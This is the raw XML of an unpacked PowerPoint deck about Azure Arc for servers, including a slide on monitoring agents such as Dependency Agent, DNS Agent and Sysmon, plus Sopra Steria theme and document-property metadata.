              <a:t>Other Azure Agents one should know about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CE1791-496E-DDC0-5F61-3E73119F3F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716607" y="1280808"/>
            <a:ext cx="2908567" cy="1008435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Depedency Agent – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insight into network traffic, processes and communication flow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2050" name="Picture 2" descr="Azure Migrate – Initial Thoughts | VMFocus">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37113C17-6559-2DDD-2A2A-F217C670B5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217" y="1277566"/>
            <a:ext cx="5371288" cy="4664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E88AE3-975C-681B-7D6C-C2ACBFA44546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693909" y="2405974"/>
            <a:ext cx="2908567" cy="859277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DNS Agent – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collects all DNS requests done against domain controllers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88BFDCE-DD48-3E81-9D91-4B2025492FCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697152" y="3407922"/>
            <a:ext cx="2908567" cy="1060316"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sysmon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– Can also be used together with Azure Monitor to collect more detailed information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E13607E1-183A-D635-CC14-65B53953C6D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3670570" y="1478604"/>
            <a:ext cx="992221" cy="713362"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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40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8140855"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Sopra Steria Skandinavia">
  <a:themeElements>
    <a:clrScheme name="Custom 15">
      <a:dk1>
        <a:srgbClr val="494949"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="CD0C31"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F0F0F0"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="494949"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="CF022B"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="EA5599"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8C1D82"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="00A188"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="95C11F"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="990724"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="CD0C31"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Soprasteri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317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mtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="2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O Sopra Steria PPT mal feb 2020" id="{E2828493-7520-40FD-BEFE-24F149560C1C}" vid="{FFCF6721-0D74-437D-A070-FA3D7973B13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Sopra Steria">
      <a:dk1>
        <a:srgbClr val="4A4A4A"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="CF022B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F07D00"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="007AC2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="32ABD0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00A188"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="95C11F"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8C1D82"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="EA5599"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="A8A8A7"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="EDEDED"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Sopra Steri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Sopra Steria">
      <a:dk1>
        <a:srgbClr val="4A4A4A"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="CF022B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F07D00"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="007AC2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="32ABD0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00A188"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="95C11F"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8C1D82"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="EA5599"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="A8A8A7"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="EDEDED"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Soprasteri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7F7341B06EFC41B56229C9426A4853" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="632d98f4f24593ba7dc26d27f8ea4dda">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="185832c1-a361-4be1-b883-bb7893c6cdc9" xmlns:ns4="b2d2f379-e54e-4947-9c46-21371fd54172" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ee0038e635d5257d7f9bfaceee7de6e2" ns3:_="" ns4:_="">
    <xsd:import namespace="185832c1-a361-4be1-b883-bb7893c6cdc9"/>
    <xsd:import namespace="b2d2f379-e54e-4947-9c46-21371fd5417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5832c1-a361-4be1-b883-bb7893c6cdc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d2f379-e54e-4947-9c46-21371fd541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72BA675-A16A-4084-BCEF-3D37880C598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D789625-40B8-440A-A1AA-968F73136519}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="185832c1-a361-4be1-b883-bb7893c6cdc9"/>
    <ds:schemaRef ds:uri="b2d2f379-e54e-4947-9c46-21371fd5417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23CDE10-8C2E-4455-8DFD-39DE870FAAA8}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="b2d2f379-e54e-4947-9c46-21371fd54172"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="185832c1-a361-4be1-b883-bb7893c6cdc9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NO Sopra Steria PPT mal feb 2020 - Copy</Template>
  <TotalTime>3007</TotalTime>
  <Words>1946</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>294</Paragraphs>
  <Slides>26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Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Sopra Steria Skandinavia</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Azure Arc –  Anywhere management?</vt:lpstr>
      <vt:lpstr>WHOAMI?</vt:lpstr>
      <vt:lpstr>What is Azure Arc? </vt:lpstr>
      <vt:lpstr>Azure Arc for Servers</vt:lpstr>
      <vt:lpstr>Azure Arc for Servers – Architecture</vt:lpstr>
      <vt:lpstr>Security Monitoring – Seeing the whole picture!</vt:lpstr>
      <vt:lpstr>Set up proper monitoring</vt:lpstr>
      <vt:lpstr>Log Analytics Agent vs Azure Monitoring Agent (AMA)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Use-case – How many are using fileserver X?</vt:lpstr>
      <vt:lpstr>Data Collection – Have some patience! </vt:lpstr>
      <vt:lpstr>Some pratical -  Kusto queries</vt:lpstr>
      <vt:lpstr>Some pratical -  Kusto queries</vt:lpstr>
      <vt:lpstr>Some pratical -  Kusto queries</vt:lpstr>
      <vt:lpstr>Demo of Arc for servers</vt:lpstr>
      <vt:lpstr>Some useful tips when setting up Arc for servers</vt:lpstr>
      <vt:lpstr>Self-service capabilities with Arc</vt:lpstr>
      <vt:lpstr>How much does it cost to use Azure Arc on a server?</vt:lpstr>
      <vt:lpstr>Manage via Terraform (or Bicep!)</vt:lpstr>
      <vt:lpstr>Support for Different PaaS services</vt:lpstr>
      <vt:lpstr>Kubernetes integration with Arc</vt:lpstr>
      <vt:lpstr>Want to try out Arc on your own? </vt:lpstr>
      <vt:lpstr>How does Arc compare to other Management Tools?</vt:lpstr>
      <vt:lpstr>Questions? / if-time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DAIA Elena</dc:creator>
  <cp:lastModifiedBy>SANDBU Marius</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2019-09-24T07:58:07Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-24T10:48:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-24T08:42:41Z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0x010100C27F7341B06EFC41B56229C9426A4853</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Community">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Languages">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Steria location">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Document type">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_f314f5b1-ef04-46e0-8957-be9652623f41_SiteId">
    <vt:lpwstr>8b87af7d-8647-4dc7-8df4-5f69a2011bb5</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_f314f5b1-ef04-46e0-8957-be9652623f41_ActionId">
    <vt:lpwstr>75c65c41-dbd6-47e2-872f-3c96f4d6bb3a</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_f314f5b1-ef04-46e0-8957-be9652623f41_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_f314f5b1-ef04-46e0-8957-be9652623f41_ContentBits">
    <vt:lpwstr>3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_f314f5b1-ef04-46e0-8957-be9652623f41_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_f314f5b1-ef04-46e0-8957-be9652623f41_SetDate">
    <vt:lpwstr>2021-09-21T14:44:31Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MSIP_Label_f314f5b1-ef04-46e0-8957-be9652623f41_Name">
    <vt:lpwstr>C2 - UK</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>